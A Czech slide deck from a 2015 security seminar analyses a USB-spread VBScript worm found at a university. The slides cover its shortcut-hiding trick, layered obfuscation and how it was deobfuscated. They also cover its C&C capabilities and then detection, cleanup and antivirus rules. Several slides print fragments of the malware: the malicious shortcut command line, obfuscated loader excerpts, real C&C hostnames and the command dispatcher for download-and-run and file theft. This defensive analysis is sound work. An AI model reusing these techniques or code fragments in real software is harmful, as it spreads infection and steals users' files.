  • 8. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 8 Stále kvoká, stále kvoká, ... ● Výskyt dalších případů ● Uživatelé stanice mimo správu IT oddělení ● Studenti a jejich flashdisky ● Opakované nákazy ● Potřeba hlubší analýzy ● Nedostatek vlastních kapacit ● Hlavně nedostatek času ● Zadání analýzy externímu subjektu ● CESNET FLAB
  • 9. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 9 Dějství II: Analýza malware
  • 10. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 10 Zadání pro FLAB ● Zadání ● Malware na flashdisku pro každý soubor vytvoří zástupce a původní soubor schová, takže uživatel spouští (dvouklikem) zástupce, který kromě vlastního souboru spustí ještě VBScript, který zajišťuje šíření malware a asi i další aktivitu. ● Otázky k zodpovězení 1) Jakou funkcionalitou malware disponuje? 2) Lze přítomnost malware poznat podle síťového chování? 3) Jak nastavit pravidla pro antivirový systém, aby blokoval tento malware?
  • 11. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 11 Zadání pro FLAB ● Podklady pro analýzu ● Předány elektronicky dva soubory ● Přípona „.norun“ ● Zamezení neúmyslnému spuštění ● Microsoft Excel.WsF.norun ● Malware nalezený na napadeném flashdisku ● Evidenční číslo 001 ● IMG_2402.lnk.norun ● Jeden ze zástupců vytvořený malwarem na napadeném flashdisku ● Evidenční číslo 002
  • 12. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 12 Analýza zástupce (ev. č. 002) ● Položka „cíl“ zástupce: ● Po odstranění cls (clear screen): ● Zajišťuje spuštění malware – každé otevření souboru C:WINDOWSsystem32cmd.exe /c cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&cls&start IMG_2402.JPG&cls&cls&cls&cls&cls&cls&cls&cls&cls& cls&cls&start Microsoft" "Excel.WsF&cls&cls&cls& cls&cls&cls&cls&cls&cls&cls&cls&exit start IMG_2402.JPG //původní soubor start Microsoft" "Excel.WsF //malware exit //zavření okna
  • 13. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 13 Analýza zástupce (ev. č. 002) ● Využití výchozího nastavení ● „Nezobrazovat skryté soubory“ = ano, zatajit existenci ● „Skrývání přípon známých typů“ = ano, zatajit informaci Dokument.docx Dokument.docx Dokument.lnk Microsoft" "Excel.WsF Skrytý soubor Zástupce Čistý flashdisk Napadený flashdisk Malware
  • 14. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 14 Analýza malware (ev. č. 001) ● Obsah souboru – obfuskovaný VB Script <package> <job id="manage-bde"> <script language="VBScript"> Dim nTWAAKaqMncGOLEYPcXDTqcWJAj:nTWAAKaqMncGOLEYPcXDTqcWJAj="kyz NMWZrwnYxTfZmaVff":If nTWAAKaqMncGOLEYPcXDTqcWJAj="kyzNMWZrwnYxT fZmaVff"Then:End If:Dim LzcAEAXYFzttkGGoBj:LzcAEAXYFzttkGGoBj="v uWeIryKEArjjHfVnrNb":If ... If:LB="}}}!}}!}?}^}{}|+?^}{}%^}^-}}|-]^^}}|-]-^+?|!^|-_|}}|}^/| -^‫^|؟|-_*_?{/{-{!^[^[|-^[_}-*{_||-^[^]^[|?^/-]|?^{{/-{{}/{[_*{؟‬ ... fUNCTioN FRANCE(VIANA):Dim ZxyjgajpHRCEFtq ... GRECE=FRANCE(20+20+9)TO(LONDON(BOSNA)/FRANCE(10*5)) ... </script> </job> </package>
  • 15. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 15 Analýza malware (ev. č. 001) ● Deobfuskace – varianta „hrubá síla“ ● Rozebrat činnost funkcí a získat kód ● To opravdu není dobrý nápad ... ● Deobfuskace – varianta „jemný intelekt“ ● Sestavení a spuštění kódu je realizováno funkcí ● Místo spuštění necháme výsledný kód jen zobrazit :%s/ExecuteGlobal/WScript.echo/ ● Uložení výsledku cscript echo_script.WsF > unpacked1.Wsf ExeCuTeGloBal(ITALI(FRANCE(50-30+17),LB))
  • 16. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 16 Analýza malware (ev. č. 001) ● Výsledek po deobfuskaci – další (jiná) obfuskace ● Stejný postup (náhrada GlobalExecute za Wscript.echo) cscript echo_unpacked1.WsF > unpacked2.Wsf <package> <job id="manage-bde"> <script language="VBScript"> COLOMBIA=VINSULA(USA("=oVeqCcWem/x{}GEOXXeXy+FqeXZXmW*mSG#IWH{LbG {LeGwmSOzzXOJi/Vo}/SWFmWXOEG#QcZsCcWem/x{/NNcVNzXVMqWGxFc/zK/X/Q DotX{fRXELNOELicWOzzXOJi/VPL{WyqWGR}RLu}/SWFmWXOEG/FyW-MXNxFc/zK/X /qWGRmlLuLDYR-SvzMXS!XEXo/Tvxi}/ .... +cHr(CByte("&H"&Mid(PANAMA,3,2)))+cHr(CByte("&H"&Mid(PANAMA,5,2))): PUREAU=PUREAU+Left(CANADA,KOUBA):Next:UREGWAY=PUREAU:End Function:F unction USA(HINDORAS):Dim i:For i=1 To Len(HINDORAS):USA=Mid(HINDOR AS,i,1)&USA:next:End Function </script> </job> </package>
  • 17. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 17 Analýza malware (ev. č. 001) ● Výsledek po druhé deobfuskaci – už zase (!) ● Stejný postup (náhrada GlobalExecute za Wscript.echo) cscript echo_unpacked2.WsF > unpacked3.Wsf <package> <job id="manage-bde"> <script language="VBScript"> TUNISIA="!{]*!#/-!#*{{!#/-![=|!#/#/!#*=|!{-[{!#*{{!{-[{![=|!#*=|! #/#/!#**!{#-|!#]/|!#/#/![=|!#*-*!#/#/!#[/*!{-//!{]*!#/-!{]*!#/-!# ... FOR ALGERIE=1 TO UboUnD(TUNISIA):MAROCOO=MAROCOO+cHr(TUNISIA(ALGER IE)/(25+25-32)):NEXT:ExecuteGlobal(MAROCOO) </script> </job> </package>
  • 18. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 18 Analýza malware (ev. č. 001) ● Výsledek po třetí deobfuskaci – konečně čitelný kód On eRrOr ReSuMe NeXt dIm Az sET Az = WsCriPt.CreAtEoBjEcT("wscript.shell") dIm Aw sET Aw = CreAtEoBjEcT("scripting.filesystemobject") dIm Av sET Av = CreAtEoBjEcT("msxml2.xmlhttp") Ay = ArRaY ("maroco.linkpc.net:855", "maroco.myq-see.com:855","maroco.redirectme.net:855") Ax = Az.ExPaNdEnViRoNmEnTsTrInGs ("%appdata%") &"Microsoft Office" Aw.CreateFolder Ax Au = TRue At = True Ar = "Microsoft Excel.WsF" ...
  • 19. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 19 Analýza malware (ev. č. 001) ● Analýza kódu malware ● Iterativní činnost ● Seznam proměnných s poznámkami ● Seznam funkcí s poznámkami ● Odstraňování „eMoSTyLu z NáZVůprOMěNných“ ● Skript ● Poměrně krátký – necelých 500 řádek  kompletní analýza funkčnosti ● Vyhledání odpovědí na otázky
  • 20. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 20 Analýza malware (ev. č. 001) 1) Jakou funkcionalitou malware disponuje? ● Persistence ● Spuštění přes zástupce na médiu ● Instalace na stanici ● Rozšíření na „removable“ média ● Po instalaci na stanici (registrový klíč) ● Průběžné rozšiřování na „removable“ média ● Komunikace s C&C ● Šíření ● Přes „removable“ média – nutná součinnost uživatele fOr EACH Drive In Aw.Drives ... If Drive.Drivetype = 1 then ... '* type 1 = Removable
  • 21. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 21 Analýza malware (ev. č. 001) ● Zahájení komunikace s C&C ● V intervalu 5000ms (5s) ● Rozpoznávané pokyny z C&C serveru ● Aktualizace skriptu (tj. možná změna funkcionality) ● Změna intervalu komunikace s C&C ● Stáhnout soubor z C&C a spustit jej ● Odeslat soubor ze systému na C&C ● Odinstalování ze systému (tj. mazání stop po útoku) ● Spuštění lokální příkazu jako parametr cmd.exe (v analyzované verzi nefunkční, vývojová chyba)
  • 22. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 22 Analýza malware (ev. č. 001) ● Ukázka části kódu – schopnosti malware SeLeCt case Ao (0) case "excecute" An = Ao (1) Bd An '* ??? case "update" '* nahrazeni obsahu lokalniho skriptu parametrem An = Ao (1) Al.ClOse sET Al = Aw.OpEnTeXtFiLe (Ax & Ar ,2, FaLsE) Al.WriTe An Al.ClOse Az.RuN "WScript.exe //B " & cHr((17+17)) & Ax & Ar & cHr((17+17)) WScript.QuIt case "uninstall" Bi '* call Bi: uninstall case "send" Bn Ao (1),Ao (2) '*call Bn (param2_filename, param3_path) case "site-send" Bh Ao (1),Ao (2) '*call Bh (param2_getparam, param3_filename) case "recv"' An = Ao (1) Be (An) '*call Be (param2): odeslani zadaneho souboru na CaC case "Sleep" '* nastaveni noveho intervalu cekani v cyklu An = Ao (1) Sleep = EVal (An) eND SeLeCt
  • 23. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 23 Analýza malware (ev. č. 001) 2) Lze přítomnost malware poznat podle síťového chování? ● Ano, každých 5s komunikuje s C&C ● Port 855, C&C udáno jako hostname ● maroco.linkpc.net:855 ● maroco.myq-see.com:855 ● maroco.redirectme.net:855 ● Zjištění IP adres v historii? ● Passive DNS
  • 24. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 24 Analýza malware (ev. č. 001) 3) Jak nastavit pravidla pro antivirový systém, aby blokoval tento malware? ● Konzultováno s WEBnet Incident Response Team ● FLAB nemá příslušný SW ● Zabezpečení koncových stanic ZČU ● Dodavatel XxXxxx ● WsF je v kategorii „Script“ - nelze globálně zakázat ● Jediná možnost – ruční pravidlo „blokování *.WsF“
  • 25. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 25 Dějství III: Využití informací
  • 26. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 26 Nalezení napadených zařízení ● Síťová komunikace ● Port 855, IP adresy odpovídající daným hostname ● Identifikace stanic, uživatelů ● Vytěžení uživatelů stanic ● Jaké flashdisky používáte? ● Kam jste své flashdisky připojoval? ● Kdo připojoval své flashdisky k Vašemu zařízení? ● Identifikace dalších uživatelů ● Mimo ZČU (např. kopírovací centrum)
  • 27. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 27 Reakce a prevence ● Připraveny „nápravné“ skripty ● Vychází z deobfuskovaného kódu (reverzní postup) ● uninstall.vbs – odstranění malware ze systému ● clean.vbs – odstranění nákazy z „removable“ médií ● Pro aktuálně připojené – možno snadno vyčistit ● Instrukce pro IT HelpDesk ● Připravena webová stránka pro uživatele ● Postup + skripty ke stažení ● Úprava pravidel AV systému
  • 28. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 28 Univerzitní sítí to nekončí
  • 29. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 29 Univerzitní sítí to nekončí Dobrý den. Měl bych na Vás velkou prosbu. Nejsem však student vaší školy. Našel jsem odkaz: http://support.zcu.cz/.. Manželka "přitáhla" ze školy tento trojan a práskla to do notebooku a PC v práci. Mohl bych Vás požádat o zpřístupnění, či odkaz na stažení tohoto skriptu. Moc děkuji.
  • 30. 2015-02-09, Seminář o bezpečnosti sítí a služeb, Praha 30 Dotazy a diskuse